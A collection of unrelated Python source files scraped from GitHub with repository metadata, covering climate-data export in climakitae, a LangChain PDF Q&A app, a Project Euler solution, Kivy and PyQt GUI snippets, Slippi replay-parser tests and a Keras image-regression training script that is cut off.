Prepare xarray Dataset for export as CSV file.
Convert the xarray Dataset `dataset` to a pandas DataFrame ready to be
exported to CSV format. The Dataset is converted through its to_dataframe
method. The DataFrame header is renamed as needed to ease the access of
columns in R. It is also enriched with the units associated with the data
variables and other non-index variables in the Dataset. If the Dataset
contains station data, the name of any climate variable associated with
the station(s) is added to the header as well.
Parameters
----------
dataset : xarray.Dataset
data to be prepared for export
Returns
-------
pandas.DataFrame
data ready for export
"""
df = dataset.to_dataframe()
variable_unit_map = [
(var_name, _get_unit(dataset[var_name])) for var_name in df.columns
]
df = _update_header(df, variable_unit_map)
# Helpers for adding to header climate variable names associated w/ stations
station_df = read_csv_file(stations_csv_path)
station_lst = list(station_df.station)
def _is_station(name):
"""Return True if `name` is an HadISD station name."""
return name in station_lst
variable_description_df = read_csv_file(variable_descriptions_csv_path)
variable_ids = variable_description_df.variable_id.values
def _variable_id_to_name(var_id):
"""Convert variable ID to variable name.
Return the "display_name" associated with the "variable_id" in
variable_descriptions.csv. If `var_id` is not a "variable_id" in the
CSV file, return an empty string.
"""
if var_id in variable_ids:
var_name_series = variable_description_df.loc[
variable_ids == var_id, "display_name"
]
var_name = var_name_series.to_list()[0]
return var_name
else:
return ""
def _get_station_variable_name(dataset, station):
"""Get name of climate variable stored in `dataset` variable `station`.
Return an empty string if that is not possible.
"""
try:
station_da = dataset[station] # DataArray
data_attrs = station_da.attrs
if "variable_id" in data_attrs and data_attrs["variable_id"] is not None:
var_id = data_attrs["variable_id"]
var_name = _variable_id_to_name(var_id)
return var_name
else:
return ""
except:
return ""
# Add to header: name of any climate variable associated with stations
column_names = df.columns.get_level_values(0)
climate_var_lst = []
for name in column_names:
if _is_station(name):
climate_var = _get_station_variable_name(dataset, station=name)
else:
climate_var = ""
climate_var_lst.append(climate_var)
if set(climate_var_lst) != {""}:
# Insert climate variable names to the 2nd row
header_df = df.columns.to_frame()
header_df.insert(1, "", climate_var_lst)
# The 1st row was named "variable" by `_update_header`
header_df.variable = header_df.variable.map(_ease_access_in_R)
df.columns = pd.MultiIndex.from_frame(header_df)
return df
def _export_to_csv(data, output_path):
"""
Export user-selected data to CSV format.
Export the xarray DataArray or Dataset `data` to a CSV file at
`output_path`.
Parameters
----------
data : xarray.DataArray or xarray.Dataset
data to export to CSV format
output_path : string
desired output file path, including the file name and file extension
Returns
-------
None
"""
print("Alright, exporting specified data to CSV.")
ftype = type(data)
if ftype == xr.core.dataarray.DataArray:
df = _dataarray_to_dataframe(data)
elif ftype == xr.core.dataset.Dataset:
df = _dataset_to_dataframe(data)
# Warn about exceedance of Excel row or column limit
excel_row_limit = 1048576
excel_column_limit = 16384
csv_nrows, csv_ncolumns = df.shape
if csv_nrows > excel_row_limit or csv_ncolumns > excel_column_limit:
warnings.warn(
f"Dataset exceeds Excel limits of {excel_row_limit} rows "
f"and {excel_column_limit} columns."
)
_metadata_to_file(data, output_path)
df.to_csv(output_path, compression="gzip")
def export(data, filename="dataexport", format="NetCDF"):
"""Save data as a file in the current working directory.
Parameters
----------
data : xr.DataArray or xr.Dataset
Data to export, as output by e.g. `climakitae.Select().retrieve()`.
filename : str, optional
Output file name (without file extension, i.e. "my_filename" instead
of "my_filename.nc"). The default is "dataexport".
format : str, optional
File format ("NetCDF" or "CSV"). The default is "NetCDF".
"""
ftype = type(data)
if ftype not in [xr.core.dataset.Dataset, xr.core.dataarray.DataArray]:
raise Exception(
"Cannot export object of type "
+ str(ftype).strip("<class >")
+ ". Please pass an xarray dataset or data array."
)
if type(filename) is not str:
raise Exception(
(
"Please pass a string"
" (any characters surrounded by quotation marks)"
" for your file name."
)
)
filename = filename.split(".")[0]
req_format = format.lower()
if req_format not in ["netcdf", "csv"]:
raise Exception('Please select "NetCDF" or "CSV" as the file format.')
extension_dict = {"netcdf": ".nc", "csv": ".csv.gz"}
save_name = filename + extension_dict[req_format]
ds_attrs = data.attrs
ct = datetime.datetime.now()
ct_str = ct.strftime("%d-%b-%Y (%H:%M)")
ck_attrs = {
"Data_exported_from": "Cal-Adapt Analytics Engine",
"Data_export_timestamp": ct_str,
"Analysis_package_name": "climakitae",
"Version": _version("climakitae"),
"Author": "Cal-Adapt Analytics Engine Team",
"Author_email": "analytics@cal-adapt.org",
"Home_page": "https://github.com/cal-adapt/climakitae",
"License": "BSD 3-Clause License",
}
ds_attrs.update(ck_attrs)
data.attrs = ds_attrs
# now here is where exporting actually begins
# we will have different functions for each file type
# to keep things clean-ish
if "netcdf" == req_format:
_export_to_netcdf(data, save_name)
elif "csv" == req_format:
output_path = "./" + save_name
if os.path.exists(output_path):
raise Exception(
(
f"File {save_name} exists. "
"Please either delete that file from the work space "
"or specify a new file name here."
)
)
# now check file size and avail workspace disk space
# raise error for not enough space
# and warning for large file
file_size_threshold = 5 # in GB
disk_space = shutil.disk_usage("./")[2] / bytes_per_gigabyte
data_size = data.nbytes / bytes_per_gigabyte
if disk_space <= data_size:
raise Exception(
"Not enough disk space to export data! You need at least "
+ str(round(data_size, 2))
+ (
" GB free in the hub directory, which has 10 GB total space."
" Try smaller subsets of space, time, scenario, and/or"
" simulation; pick a coarser spatial or temporal scale;"
" or clean any exported datasets which you have already"
" downloaded or do not want."
)
)
if data_size > file_size_threshold:
print(
"WARNING: xarray data size is "
+ str(round(data_size, 2))
+ " GB. This might take a while!"
)
_export_to_csv(data, output_path)
print(
(
"Saved! You can find your file(s) in the panel to the left"
" and download to your local machine from there."
)
)
def _metadata_to_file(ds, output_name):
"""
Write NetCDF metadata to a txt file so users can still access it
after exporting to a CSV.
"""
def _rchop(s, suffix):
if suffix and s.endswith(suffix):
return s[: -len(suffix)]
return s
output_name = _rchop(output_name, ".csv.gz")
if os.path.exists(output_name + "_metadata.txt"):
os.remove(output_name + "_metadata.txt")
print(
"NOTE: File metadata will be written in "
+ output_name
+ (
"_metadata.txt. We recommend you download this along with "
"the CSV for your records."
)
)
with open(output_name + "_metadata.txt", "w") as f:
f.write("======== Metadata for CSV file " + output_name + " ========")
f.write("\n")
f.write("\n")
f.write("\n")
f.write("===== Global file attributes =====")
if type(ds) == xr.core.dataarray.DataArray:
f.write("\n")
f.write("Name: " + ds.name)
f.write("\n")
for att_keys, att_values in ds.attrs.items():
f.write(str(att_keys) + " : " + str(att_values))
f.write("\n")
f.write("\n")
f.write("\n")
f.write("===== Coordinate descriptions =====")
f.write("\n")
f.write("Note: coordinate values are in the CSV")
f.write("\n")
for coord in ds.coords:
f.write("\n")
f.write("== " + str(coord) + " ==")
f.write("\n")
for att_keys, att_values in ds[coord].attrs.items():
f.write(str(att_keys) + " : " + str(att_values))
f.write("\n")
if type(ds) == xr.core.dataset.Dataset:
f.write("\n")
f.write("\n")
f.write("===== Variable descriptions =====")
f.write("\n")
for var in ds.data_vars:
f.write("\n")
f.write("== " + str(var) + " ==")
f.write("\n")
for att_keys, att_values in ds[var].attrs.items():
f.write(str(att_keys) + " : " + str(att_values))
f.write("\n")
## TMY export functions
def _tmy_header(location_name, df):
"""
Constructs the header for the TMY output file in .tmy format
Source: https://www.nrel.gov/docs/fy08osti/43156.pdf (pg. 3)
"""
# line 1 - site information
# line 1: USAF, station name quote delimited, station state, time zone, lat, lon, elev (m)
# line 1: we provide station name, lat, lon, and simulation
line_1 = "'{0}', {1}, {2}, {3}\n".format(
location_name,
df["lat"].values[0],
df["lon"].values[0],
df["simulation"].values[0],
)
# line 2 - data field name and units, manually setting to ensure matches TMY3 labeling
line_2 = "Air Temperature at 2m (degC),Dew point temperature (degC),Relative humidity (%),Instantaneous downwelling shortwave flux at bottom (W m-2),Shortwave surface downward diffuse irradiance (W m-2),Instantaneous downwelling longwave flux at bottom (W m-2),Wind speed at 10m (m s-1),Wind direction at 10m (deg),Surface Pressure (Pa)\n"
headers = [line_1, line_2]
return headers
def _epw_header(location_name, df):
"""
Constructs the header for the TMY output file in .epw format
Source:https://designbuilder.co.uk/cahelp/Content/EnergyPlusWeatherFileFormat.htm#:~:text=The%20EPW%20weather%20data%20format,based%20with%20comma%2Dseparated%20data.
"""
# line 1 - location
line_1 = "LOCATION,{0},{1},{2}\n".format(
location_name, df["lat"].values[0], df["lon"].values[0]
)
# line 2 - design conditions, leave blank for now
line_2 = "DESIGN CONDITIONS\n"
# line 3 - typical/extreme periods, leave blank for now
line_3 = "TYPICAL/EXTREME PERIODS\n"
# line 4 - ground temperatures, leave blank for now
line_4 = "GROUND TEMPERATURES\n"
# line 5 - holidays/daylight savings, leap year (yes/no), daylight savings start, daylight savings end, num of holidays
line_5 = "HOLIDAYS/DAYLIGHT SAVINGS,No,0,0,0\n"
# line 6 - comments 1, going to include simulation + scenario information here
line_6 = "COMMENTS 1,Typical meteorological year data produced on the Cal-Adapt: Analytics Engine, Scenario: {0}, Simulation: {1}\n".format(
df["scenario"].values[0], df["simulation"].values[0]
)
# line 7 - comments 2, putting the data variables here manually as they are not specified in epw format, and we are not including all
line_7 = "COMMENTS 2,Air Temperature at 2m (degC),Dew point temperature (degC),Relative humidity (%),Instantaneous downwelling shortwave flux at bottom (W m-2),Shortwave surface downward diffuse irradiance (W m-2),Instantaneous downwelling longwave flux at bottom (W m-2),Wind speed at 10m (m s-1),Wind direction at 10m (deg),Surface Pressure (Pa)\n"
# line 8 - data periods, num data periods, num records per hour, data period name, data period start day of week, data period start (Jan 1), data period end (Dec 31)
line_8 = "DATA PERIODS,1,1,Data,,1/1,12/31\n"
headers = [line_1, line_2, line_3, line_4, line_5, line_6, line_7, line_8]
return headers
def write_tmy_file(filename_to_export, df, location_name="location", file_ext="tmy"):
"""Exports TMY data either as .epw or .tmy file
Parameters
---------
filename_to_export (str): Filename string, constructed with station name and simulation
df (pd.DataFrame): Dataframe of TMY data to export
location_name (str, optional): Location name string, often station name
file_ext (str, optional): File extension for export, default is .tmy, options are "tmy" and "epw"
Returns
-------
None
"""
# check that data passed is a DataFrame object
if type(df) != pd.DataFrame:
raise ValueError(
"The function requires a pandas DataFrame object as the data input"
)
# typical meteorological year format
if file_ext == "tmy":
path_to_file = filename_to_export + ".tmy"
with open(path_to_file, "w") as f:
f.writelines(_tmy_header(location_name, df)) # writes required header lines
df = df.drop(
columns=["simulation", "lat", "lon", "scenario"]
) # drops header columns from df
dfAsString = df.to_csv(sep=",", header=False, index=False)
f.write(dfAsString) # writes file
print(
"TMY data exported to .tmy format with filename {}.tmy".format(
filename_to_export
)
)
# energy plus weather format
elif file_ext == "epw":
path_to_file = filename_to_export + ".epw"
with open(path_to_file, "w") as f:
f.writelines(_epw_header(location_name, df)) # writes required header lines
df = df.drop(
columns=["simulation", "lat", "lon", "scenario"]
) # drops header columns from df
dfAsString = df.to_csv(sep=",", header=False, index=False)
f.write(dfAsString) # writes file
print(
"TMY data exported to .epw format with filename {}.epw".format(
filename_to_export
)
)
else:
print('Please pass either "tmy" or "epw" as a file format for export.')
| cal-adapt/climakitae | climakitae/core/data_export.py | data_export.py | py | 26,702 | python | en | code | 11 | github-code | 1 | [
{
"api_name": "xarray.set_options",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "xarray.core",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "xarray.core",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "xarray.core",
... |
37210347927 | # Import os to set API key
import os
# Import OpenAI as main LLM service
from langchain.llms import OpenAI
from langchain.embeddings import OpenAIEmbeddings
# Bring in streamlit for UI/app interface
import streamlit as st
# Read the markdown content from a file
with open("styles.md", "r") as f:
markdown_content = f.read()
st.markdown(markdown_content, unsafe_allow_html=True)
# Import PDF document loaders...there's other ones as well!
from langchain.document_loaders import PyPDFLoader
# Import chroma as the vector store
from langchain.vectorstores import Chroma
# Import vector store stuff
from langchain.agents.agent_toolkits import (
create_vectorstore_agent,
VectorStoreToolkit,
VectorStoreInfo
)
# Set APIkey for OpenAI Service
with open("api_key.txt", "r") as file:
api_key = file.read().strip()
os.environ['OPENAI_API_KEY'] = api_key
# Create instance of OpenAI LLM
llm = OpenAI(temperature=0.1, verbose=True)
embeddings = OpenAIEmbeddings()
# Create and load PDF Loader
loader = PyPDFLoader('FinanceReport.pdf')
# Split pages from pdf
pages = loader.load_and_split()
# Load documents into vector database aka ChromaDB
store = Chroma.from_documents(pages, embeddings, collection_name='Report2023')
# Create vectorstore info object - metadata repo?
vectorstore_info = VectorStoreInfo(
name="finance_report",
description="a finance report as a pdf",
vectorstore=store
)
# Convert the document store into a langchain toolkit
toolkit = VectorStoreToolkit(vectorstore_info=vectorstore_info)
# Add the toolkit to an end-to-end LC
agent_executor = create_vectorstore_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
# Create a text input box for the user
prompt = st.text_input('Input your request here')
# If the user hits enter
if prompt:
# Then pass the prompt to the LLM
response = agent_executor.run(prompt)
# ...and write it out to the screen
st.write(response) | NikolaienkoIgor/RAGreport | app.py | app.py | py | 1,942 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "streamlit.markdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "langchain.llms.OpenAI",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "langchain.em... |
4062645307 | # Powerful digit counts
# Problem 63
# The 5-digit number, 16807=7**5, is also a fifth power. Similarly, the 9-digit number, 134217728=8**9, is a ninth power.
# How many n-digit positive integers exist which are also an nth power?
# https://projecteuler.net/problem=63
import datetime
start_time = datetime.datetime.now()
# counting the first pow for 1-9 numbers - we already have 9 at the start
iCount = 9
for i in range(2, 10):
pow_i = i
bFound = False
# starts with square (pow = 2)
for j in range(2, 100):
pow_i *= i
s = str(pow_i)
if len(s) == j:
iCount += 1
bFound = True
else:
if bFound:
break
stop_time = datetime.datetime.now()
print(stop_time - start_time)
print(iCount) | IgorKon/ProjectEuler | 063.py | 063.py | py | 785 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "da... |
2284786552 | import os
from kivy.app import App
from kivy.core.window import Window
from kivy.metrics import dp
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from kivy.uix.image import Image
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.scrollview import ScrollView
class SquareImage(Image):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.allow_stretch = True
self.keep_ratio = False
self.size_hint_y = None
self.height = dp(self.width)
class MyNewGallery(Screen):
def __init__(self, **kwargs):
super().__init__(**kwargs)
my_scroll = ScrollView(size_hint=(1, None), size=(Window.width, Window.height))
self.my_gallery_grid = GridLayout(cols=3, spacing=dp(5), padding=dp(5),
size_hint=(1, None), height=1000)
self.add_images_to_gallery()
my_scroll.add_widget(self.my_gallery_grid)
self.add_widget(my_scroll)
def add_images_to_gallery(self, *args):
path = "/home/petchorine/Desktop/monPyhon/mes_projets_python/Double_view/Images"
for filename in os.listdir(path):
if os.path.isfile(os.path.join(path, filename)):
img = SquareImage(source=f"/home/petchorine/Desktop/monPyhon/mes_projets_python/Double_view/Images/{filename}")
self.my_gallery_grid.add_widget(img)
def refresh_gallery(self, *args):
self.my_gallery_grid.clear_widgets()
self.add_images_to_gallery()
class MenuB(Screen):
pass
class MyScreenManager(ScreenManager):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.screen1 = MyNewGallery(name="screen1")
screen2 = MenuB(name="screen2")
btn_to_screen2 = Button(text="to screen 2",
size_hint = (None, None),
size = (100,100),
pos_hint = {"right": 1})
btn_to_screen2.bind(on_press=self.to_b)
self.screen1.add_widget(btn_to_screen2)
btn_to_gallery = Button(text="to gallery",
size_hint=(None, None),
size=(100, 100),
pos_hint={"left": 1})
btn_to_gallery.bind(on_press=self.to_gallery)
screen2.add_widget(btn_to_gallery)
self.add_widget(self.screen1)
self.add_widget(screen2)
def to_b(self, *args):
self.transition.direction = "left"
self.current = "screen2"
def to_gallery(self, *args):
self.transition.direction = "right"
self.current = "screen1"
self.screen1.refresh_gallery()
class RefreshGalleryApp(App):
def build(self):
Window.size = (350,700)
return MyScreenManager()
RefreshGalleryApp().run() | petchorine/double_view | swipebtn_refresh_gallery.py | swipebtn_refresh_gallery.py | py | 2,874 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "kivy.uix.image.Image",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "kivy.metrics.dp",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "kivy.uix.screenmanager.Screen",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "ki... |
16391999279 | from PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QPushButton
from pizza.controller.ControllorePizza import ControllorePizza
class VistaEliminaPizza(QWidget):
def __init__(self, pizza, elimina_pizza, elimina_callback, parent=None):
super(VistaEliminaPizza, self).__init__(parent)
self.controllore = ControllorePizza(pizza)
self.elimina_pizza = elimina_pizza
self.elimina_callback = elimina_callback
v_layout = QVBoxLayout()
label = QLabel("Vuoi eliminare la pizza " + pizza.nome + "?")
font = label.font()
font.setPointSize(18)
label.setFont(font)
v_layout.addWidget(label)
delete_btn = QPushButton("Elimina")
delete_btn.clicked.connect(self.elimina)
v_layout.addWidget(delete_btn)
self.setLayout(v_layout)
self.resize(150, 300)
self.setWindowTitle("Elimina pizza")
def elimina(self):
self.elimina_pizza()
self.elimina_callback()
self.close()
| CappeXII/ing_software | pizza/view/VistaEliminaPizza.py | VistaEliminaPizza.py | py | 1,018 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pizza.controller.ControllorePizza.ControllorePizza",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pizza.controller.ControllorePizza",
"line_number": 9,
"usage_typ... |
38597169357 | #!/usr/bin/python3
import datetime, glob, os, subprocess, unittest
from slippi import Game, parse
from slippi.id import CSSCharacter, InGameCharacter, Item, Stage
from slippi.log import log
from slippi.metadata import Metadata
from slippi.event import Buttons, Direction, End, Frame, Position, Start, Triggers, Velocity
from slippi.parse import ParseEvent
BPhys = Buttons.Physical
BLog = Buttons.Logical
def norm(f):
return 1 if f > 0.01 else -1 if f < -0.01 else 0
def path(name):
return os.path.join(os.path.dirname(__file__), 'replays', name + '.slp')
class TestGame(unittest.TestCase):
def __init__(self, *args, **kwargs) -> None:
self.pkgname: str = "slippi"
super().__init__(*args, **kwargs)
my_env = os.environ.copy()
self.pypath: str = my_env.get("PYTHONPATH", os.getcwd())
self.mypy_opts: List[str] = ['--ignore-missing-imports']
def _game(self, name):
return Game(path(name))
def _stick_seq(self, game):
pass
# not used yet because the recorder currently puts bogus values in triggers.physical
def _trigger_seq(self, game):
last_triggers = None
trigger_seq = []
for frame in game.frames:
t = frame.ports[0].leader.pre.triggers
t = Triggers(norm(t.logical), norm(t.physical.l), norm(t.physical.r))
if (t.logical or t.physical.l or t.physical.r) and t != last_triggers:
trigger_seq.append(t)
last_triggers = t
return trigger_seq
def _button_seq(self, game):
last_buttons = None
button_seq = []
for frame in game.frames:
b = frame.ports[0].leader.pre.buttons
if (b.logical or b.physical) and b != last_buttons:
button_seq.append(b)
last_buttons = b
return button_seq
def test_run_mypy_module(self):
"""Run mypy on all module sources"""
mypy_call: List[str] = ["mypy"] + self.mypy_opts + ["-p", self.pkgname]
browse_result: int = subprocess.call(mypy_call, env=os.environ, cwd=self.pypath)
self.assertEqual(browse_result, 0, 'mypy on slippi')
def test_run_mypy_tests(self):
"""Run mypy on all tests in module under the tests directory"""
for test_file in glob.iglob(f'{os.getcwd()}/tests/*.py'):
mypy_call: List[str] = ["mypy"] + self.mypy_opts + [test_file]
test_result: int = subprocess.call(mypy_call, env=os.environ, cwd=self.pypath)
self.assertEqual(test_result, 0, f'mypy on test {test_file}')
def test_slippi_old_version(self):
game = self._game('v0.1')
self.assertEqual(game.start.slippi.version, Start.Slippi.Version(0,1,0,0))
self.assertEqual(game.metadata.duration, None)
self.assertEqual(game.metadata.players, (None, None, None, None))
self.assertEqual(game.start.players[0].character, CSSCharacter.FOX)
self.assertEqual(game.start.players[1].character, CSSCharacter.GANONDORF)
def test_game(self):
game = self._game('game')
self.assertEqual(game.metadata, Metadata._parse({
'startAt': '2018-06-22T07:52:59Z',
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {InGameCharacter.MARTH: 5209}},
'1': {'characters': {InGameCharacter.FOX: 5209}}}}))
self.assertEqual(game.metadata, Metadata(
date=datetime.datetime(2018, 6, 22, 7, 52, 59, 0, datetime.timezone.utc),
duration=5209,
platform=Metadata.Platform.DOLPHIN,
players=(
Metadata.Player({InGameCharacter.MARTH: 5209}),
Metadata.Player({InGameCharacter.FOX: 5209}),
None, None)))
self.assertEqual(game.start, Start(
is_teams=False,
random_seed=3803194226,
slippi=Start.Slippi(Start.Slippi.Version(1,0,0,0)),
stage=Stage.YOSHIS_STORY,
players=(
Start.Player(character=CSSCharacter.MARTH, type=Start.Player.Type.HUMAN, stocks=4, costume=3, team=None, ucf=Start.Player.UCF(False, False)),
Start.Player(character=CSSCharacter.FOX, type=Start.Player.Type.CPU, stocks=4, costume=0, team=None, ucf=Start.Player.UCF(False, False)),
None, None)))
self.assertEqual(game.end, End(End.Method.CONCLUSIVE))
self.assertEqual(game.metadata.duration, len(game.frames))
def test_game_skip_frames(self):
game = Game(path('game'), skip_frames=True)
self.assertEqual(game.metadata, Metadata._parse({
'startAt': '2018-06-22T07:52:59Z',
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {InGameCharacter.MARTH: 5209}},
'1': {'characters': {InGameCharacter.FOX: 5209}}}}))
self.assertEqual(game.metadata, Metadata(
date=datetime.datetime(2018, 6, 22, 7, 52, 59, 0, datetime.timezone.utc),
duration=5209,
platform=Metadata.Platform.DOLPHIN,
players=(
Metadata.Player({InGameCharacter.MARTH: 5209}),
Metadata.Player({InGameCharacter.FOX: 5209}),
None, None)))
self.assertEqual(game.start, Start(
is_teams=False,
random_seed=3803194226,
slippi=Start.Slippi(Start.Slippi.Version(1,0,0,0)),
stage=Stage.YOSHIS_STORY,
players=(
Start.Player(character=CSSCharacter.MARTH, type=Start.Player.Type.HUMAN, stocks=4, costume=3, team=None, ucf=Start.Player.UCF(False, False)),
Start.Player(character=CSSCharacter.FOX, type=Start.Player.Type.CPU, stocks=4, costume=0, team=None, ucf=Start.Player.UCF(False, False)),
None, None)))
self.assertEqual(game.end, End(End.Method.CONCLUSIVE))
self.assertFalse(game.frames)
def test_ics(self):
game = self._game('ics')
self.assertEqual(game.metadata.players[0].characters, {
InGameCharacter.NANA: 344,
InGameCharacter.POPO: 344})
self.assertEqual(game.start.players[0].character, CSSCharacter.ICE_CLIMBERS)
self.assertIsNotNone(game.frames[0].ports[0].follower)
def test_ucf(self):
self.assertEqual(self._game('shield_drop').start.players[0].ucf, Start.Player.UCF(dash_back=False, shield_drop=True))
self.assertEqual(self._game('dash_back').start.players[0].ucf, Start.Player.UCF(dash_back=True, shield_drop=False))
def test_buttons_lrzs(self):
game = self._game('buttons_lrzs')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.TRIGGER_ANALOG, BPhys.NONE),
Buttons(BLog.TRIGGER_ANALOG|BLog.L, BPhys.L),
Buttons(BLog.TRIGGER_ANALOG, BPhys.NONE),
Buttons(BLog.TRIGGER_ANALOG|BLog.R, BPhys.R),
Buttons(BLog.TRIGGER_ANALOG|BLog.A|BLog.Z, BPhys.Z),
Buttons(BLog.START, BPhys.START)])
def test_buttons_abxy(self):
game = self._game('buttons_abxy')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.A, BPhys.A),
Buttons(BLog.B, BPhys.B),
Buttons(BLog.X, BPhys.X),
Buttons(BLog.Y, BPhys.Y)])
def test_dpad_udlr(self):
game = self._game('dpad_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.DPAD_UP, BPhys.DPAD_UP),
Buttons(BLog.DPAD_DOWN, BPhys.DPAD_DOWN),
Buttons(BLog.DPAD_LEFT, BPhys.DPAD_LEFT),
Buttons(BLog.DPAD_RIGHT, BPhys.DPAD_RIGHT)])
def test_cstick_udlr(self):
game = self._game('cstick_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.CSTICK_UP, BPhys.NONE),
Buttons(BLog.CSTICK_DOWN, BPhys.NONE),
Buttons(BLog.CSTICK_LEFT, BPhys.NONE),
Buttons(BLog.CSTICK_RIGHT, BPhys.NONE)])
def test_joystick_udlr(self):
game = self._game('joystick_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.JOYSTICK_UP, BPhys.NONE),
Buttons(BLog.JOYSTICK_DOWN, BPhys.NONE),
Buttons(BLog.JOYSTICK_LEFT, BPhys.NONE),
Buttons(BLog.JOYSTICK_RIGHT, BPhys.NONE)])
def test_nintendont(self):
game = self._game('nintendont')
self.assertEqual(game.metadata.platform, Metadata.Platform.NINTENDONT)
def test_netplay_name(self):
game = self._game('netplay')
players = game.metadata.players
self.assertEqual(players[0].netplay, Metadata.Player.Netplay(code='ABCD#123', name='abcdefghijk'))
self.assertEqual(players[1].netplay, Metadata.Player.Netplay(code='XX#000', name='nobody'))
def test_console_name(self):
game = self._game('console_name')
self.assertEqual(game.metadata.console_name, 'Station 1')
def test_metadata_json(self):
game = self._game('game')
self.assertEqual(game.metadata_raw, {
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {'18': 5209}},
'1': {'characters': {'1': 5209}}},
'startAt': '2018-06-22T07:52:59Z'})
def test_v2(self):
game = self._game('v2.0')
self.assertEqual(game.start.slippi.version, Start.Slippi.Version(2,0,1))
def test_unknown_event(self):
with self.assertLogs(log, 'INFO') as log_context:
game = self._game('unknown_event')
self.assertEqual(log_context.output, ['INFO:root:ignoring unknown event type: 0xff'])
def test_items(self):
game = self._game('items')
items = {}
for f in game.frames:
for i in f.items:
if not i.spawn_id in items:
items[i.spawn_id] = i
self.assertEqual(items, {
0: Frame.Item(
damage=0,
direction=Direction.RIGHT,
position=Position(-62.7096061706543, -1.4932749271392822),
spawn_id=0,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0)),
1: Frame.Item(
damage=0,
direction=Direction.LEFT,
position=Position(20.395559310913086, -1.4932749271392822),
spawn_id=1,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0)),
2: Frame.Item(
damage=0,
direction=Direction.RIGHT,
position=Position(-3.982539176940918, -1.4932749271392822),
spawn_id=2,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0))})
class TestParse(unittest.TestCase):
def test_parse(self):
metadata = None
def set_metadata(x):
nonlocal metadata
metadata = x
parse(path('game'), {ParseEvent.METADATA: set_metadata})
self.assertEqual(metadata.duration, 5209)
if __name__ == '__main__':
unittest.main()
| hohav/py-slippi | test/replays.py | replays.py | py | 11,337 | python | en | code | 54 | github-code | 1 | [
{
"api_name": "slippi.event.Buttons.Physical",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "slippi.event.Buttons",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "slippi.event.Buttons.Logical",
"line_number": 14,
"usage_type": "attribute"
},
... |
5875820973 | import gc
import numpy as np
import pandas as pd
import tensorflow as tf
import os
import cv2
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.style.use("seaborn-v0_8")
from tqdm import tqdm
# pathlib to my loccal file
files = os.listdir("/home/michael/Desktop/archive/dataset/")
files
# initialisation of array
image_array = [] # it's a list later i will convert it to array
label_array = []
path = "/home/michael/Desktop/archive/dataset/"
# loop through each sub-folder in train data
for i in range(len(files)):
# files in sub-folder
file_sub = os.listdir(path + files[i])
for k in tqdm(range(len(file_sub))):
try:
img = cv2.imread(path + files[i] + "/" + file_sub[k])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (96, 96))
image_array.append(img)
label_array.append(i)
except:
pass
# collecting garbae
gc.collect()
# importing process utils
import psutil
print(psutil.virtual_memory())
# image arrays
image_array = np.array(image_array) / 255.0
label_array = np.array(label_array)
# importing sckit data
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(image_array, label_array, test_size=0.15)
from keras import layers, callbacks, utils, applications, optimizers
from keras.models import Sequential, Model, load_model
# checking file length
len(files)
model = Sequential()
# I will use MobileNetV2 as an pretrained model
pretrained_model = tf.keras.applications.EfficientNetB0(input_shape=(96, 96, 3), include_top=False,
weights="imagenet")
model.add(pretrained_model)
model.add(layers.GlobalAveragePooling2D())
# add dropout to increase accuracy by not overfitting
model.add(layers.Dropout(0.3))
# add dense layer as final output
model.add(layers.Dense(1))
model.summary()
# model seuen
model.compile(optimizer="adam", loss="mean_squared_error", metrics=["mae"])
# creating a chechpoint to save model at best accuarcy
ckp_path = "trained_model/model"
model_checkpoint = tf.keras.callbacks.ModelCheckpoint(filepath=ckp_path,
monitor="val_mae",
mode="auto",
save_best_only=True,
save_weights_only=True)
# create a lr reducer which decrease learning rate when accuarcy does not increase
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(factor=0.9, monitor="val_mae",
mode="auto", cooldown=0,
patience=5, verbose=1, min_lr=1e-6)
# patience : wait till 5 epoch
# verbose : show accuracy every 1 epoch
# min_lr=minimum learning rate
# model train_test_split
EPOCHS = 300
BATCH_SIZE = 64
history = model.fit(X_train,
Y_train,
validation_data=(X_test, Y_test),
batch_size=BATCH_SIZE,
epochs=EPOCHS,
